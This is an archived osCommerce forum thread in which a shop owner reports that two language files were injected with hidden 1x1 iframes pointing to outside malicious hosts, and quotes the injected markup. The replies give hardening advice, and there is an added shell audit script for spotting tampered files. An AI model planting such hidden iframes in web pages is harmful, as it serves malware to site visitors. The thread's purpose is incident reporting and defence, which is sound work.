
osCommerce


osCommerce Hacked??


jethfo


Posted

The following code was somehow inserted into two oscommerce files on my server. This caused malicious code to be executed in the background when anyone tried to open the site. I cleaned out the hack and changed the permissions back to -rwxr-xr-x on both files. Somehow the hacker was able to change the permission of these files to be world writeable -rwxrwxrwx.

/catalog/includes/languages/english.php

/catalog/includes/languages/english/default.php

<iframe src="http://aflashcounter.net/tds/out.php?s_id=6" frameborder="0" height="1" width="1"></iframe><span style="visibility: hidden"><iframe src="http://skaska.biz/ver2/login.php" width="1" height="1"></iframe></span>

Does anyone know how this could've happened and how I can prevent it from happening again? I've had similar problems with Forums being hacked in the past.

Thanks for the help in advance!

Posted

I worry about this kind of thing all the time. If I expect to be a successful online retailer, getting hacked is about the worst thing that can possibly happen. So I'm always very wary of open source programs such as this one, because any hacker can download the free package, learn the ins and outs of the program, and learn to hack every single one of our stores. It's always safer to write your own unique code and not share it with anyone. However, I do not know PHP, so I'm kind of screwed and at the mercy of programs such as this one.

Posted

Run a dedicated non-shared Linux server. Also, users, hackers, crackers can insert code into MySQL using a text field in a form. Somewhere there is a document that establishes the way to code to avoid these situations. If a basic HTML form is used without the osCommerce secure functions, then a customer can insert PHP code into the field to the db, and it can then be inserted into a file with a simple view of the data they just input. Then you're hacked.

Use tep_href, tep_db_prepare_input, tep_db_input, and the form functions provided in OSC like tep_draw_input_field.

nibl69... have faith in osc and PHP. You are not at the mercy but in the grace of a lot of good programmers. It is not true that you can write your own unique code and think it is safe. It may not take all of the practices involved in keeping a site hack proof.

Posted

One quick thing I did and recommend is to disable/remove the 'Define Language' and 'File Manager' tools on the Tools menu in the Admin Control Panel (I removed the files too since they can be called directly from the address bar) because I do not need access through there (because I can do it from my site control panel). In case someone hacks/cracks/finds out the admin .htaccess info to access it, they will not have access to modify these files. I also installed a contribution called 'Site Monitor' which emails me as soon as a page or anything else has changed on the site. I also renamed/moved my download folder behind the public_html section too.

I just try to make this as secure as possible, but there is always a way to hack anything... the thing is to make it a little more difficult to discourage the intruders.
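As an added example (not code from this thread or from osCommerce), a small POSIX shell audit that checks for the two symptoms jethfo reported in the first post, world-writable files and hidden iframe markup injected into language files, and keeps a checksum baseline in the spirit of the 'Site Monitor' approach described above. The webroot path and the baseline file location are assumptions; the constants are constructed for illustration.

```shell
#!/bin/sh
# Added example, not from the thread or the osCommerce project.
# Usage (paths are assumptions):
#   oscaudit_world_writable /var/www/catalog
#   oscaudit_injected_markup /var/www/catalog
#   oscaudit_baseline /var/www/catalog /root/catalog.cksum
#   oscaudit_diff     /var/www/catalog /root/catalog.cksum

# Print every regular file under $1 that anyone on the host may write
# (the -rwxrwxrwx mode reported above). -perm -002 tests the o+w bit.
oscaudit_world_writable() {
    find "$1" -type f -perm -002 2>/dev/null | sort
}

# Print every .php file under $1 that carries an <iframe> tag or a
# visibility:hidden span. Genuine osCommerce language files only define()
# PHP constants, so raw HTML of this kind in one of them indicates tampering.
oscaudit_injected_markup() {
    find "$1" -type f -name '*.php' \
        -exec grep -liE '<iframe|visibility: *hidden' {} + 2>/dev/null | sort
}

# Record a checksum baseline of the tree under $1 into file $2.
# cksum is POSIX; each line is "checksum size path", sorted by path.
oscaudit_baseline() {
    find "$1" -type f -exec cksum {} + | sort -k3 > "$2"
}

# Compare the tree under $1 against baseline $2 and print one line per
# changed, added or removed file: "<" for the baseline side, ">" for now.
oscaudit_diff() {
    tmp=$(mktemp)
    find "$1" -type f -exec cksum {} + | sort -k3 > "$tmp"
    diff "$2" "$tmp" | grep '^[<>]' | awk '{print $1, $4}'
    rm -f "$tmp"
}
```

Run the baseline right after a clean install or cleanup, and run the other three checks from cron so a change to english.php or default.php surfaces before customers load the injected page.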

Posted
I worry about this kind of thing all the time. If I expect to be a successful online retailer, getting hacked is about the worst thing that can possibly happen. So I'm always very weary of open source programs such as this one, because any hacker can download the free package, learn the ins and outs of the program, and learn to hack every single one of our stores. It's always safer to write your own unique code and not share it with anyone. However, I do not know PHP, so I'm kind of screwed and at the mercy of programs such as this one.

You should probably inform Red Hat, IBM and all of the other companies that work with Linux of this problem. PHP is also open source. Maybe osCommerce could get hacked from the ground up?

Other great Open Source (Free) programs: (Free as in free speech not free beer)

The GIMP - An image program. | Firefox - All you have to do is add the Web Developer add-on to make this web browser complete. | FileZilla - An FTP program. | Inkscape - A good program to create images with. | Thunderbird - An email program. | OpenOffice.org - An office suite that is compatible with MS Office. | AbiWord - Another office suite. | Audacity - A sound recording tool. | ddp's Picks | WordPress - An easy to use blogging software. | Joomla - An easy to use CMS that has ecommerce plug-ins. | Drupal - Another CMS

How do I find these programs? Google Search!

Archived

This topic is now archived and is closed to further replies.
